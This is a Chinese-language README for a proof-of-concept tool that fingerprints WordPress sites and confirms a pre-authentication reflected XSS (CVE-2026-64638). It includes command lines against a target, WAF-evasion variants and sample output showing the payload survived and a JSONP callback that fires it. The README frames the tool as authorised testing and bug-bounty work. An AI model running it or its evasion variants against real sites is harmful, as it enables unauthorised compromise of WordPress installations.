一个用于验证 CVE-2026-64638 的概念验证(PoC)工具,该漏洞是一个影响 WordPress 安装(6.4 – 7.0.2 版本)的预认证反射型跨站脚本(XSS)漏洞。
该工具自动执行针对 CVE-2026-64638 的指纹识别、验证和 PoC 生成流程。它能够在不部署恶意负载的情况下,安全地确认目标 WordPress 安装是否存在预认证反射型 XSS 漏洞。若确认目标存在漏洞,它可生成 HTML PoC,用于授权安全测试及收录到漏洞赏金报告中。
standard、envelope、waf),用于测试不同的过滤场景。readme.html 或已入队的脚本参数识别 WordPress 版本。wp-login.php 可访问且功能正常。wp-login.php 发送精心构造的用户名负载,并检查响应中所需的 DOM 元素(例如 ajaxurl、color-picker)是否在清洗后仍然存在。requests>=2.31.0、urllib3克隆仓库并安装所需依赖:
git clone https://github.com/your-username/xss2shell-poc.git
cd xss2shell-poc
pip install -r requirements.txt
该工具无需任何环境变量或复杂的配置文件。所有参数均直接通过命令行参数传递。
使用 Python 3 对授权目标运行该工具。
python3 xss2shell_poc.py -t https://target.com --check-only
python3 xss2shell_poc.py -t https://target.com
如果标准负载被 WAF 拦截,或 REST 端点返回 HTTP 401,请尝试替代变体:
python3 xss2shell_poc.py -t https://target.com --variant waf
python3 xss2shell_poc.py -t https://target.com --variant envelope
python3 xss2shell_poc.py -t https://target.com -o custom_poc.html
.
├── .gitignore
├── CONTRIBUTING.md
├── LICENSE
├── README.md
├── SECURITY.md
├── requirements.txt
└── xss2shell_poc.py
Target : https://target.com
Variant : standard
Mode : Full PoC
[>] Phase 1 — WordPress Version Fingerprint
[+] WordPress 7.0.2 — VULNERABLE (6.4 – 7.0.2)
[>] Phase 2 — Confirm Login Page
[+] wp-login.php reachable (HTTP 200)
[>] Phase 3 — Testing XSS Payload (variant: standard)
[+] XSS PAYLOAD SURVIVED SANITIZATION!
[+] Injected DOM elements found in response: ['id="ajaxurl"', 'id="color-picker"']
[>] Phase 4 — REST API JSONP Callback Check
[+] REST JSONP callback works: https://target.com/?rest_route=/&_method=GET&_jsonp=testcb
[+] jQuery will evaluate response as script → XSS fires automatically
本仓库包含与安全相关的测试工具。 有关我们的负责任披露政策和授权使用要求,请参阅 SECURITY.md。
我们欢迎专业的贡献!有关我们的工作流程、代码质量标准和提交指南的详细信息,请参阅 CONTRIBUTING.md。
本项目采用 MIT 许可证 授权。
仅供授权使用。 本项目严格用于获得系统所有者明确书面许可的授权渗透测试、安全研究和漏洞赏金计划。请勿将此工具用于您不拥有或未经许可测试的系统。作者和贡献者不对因使用本软件而造成的任何滥用、损害或法律后果负责。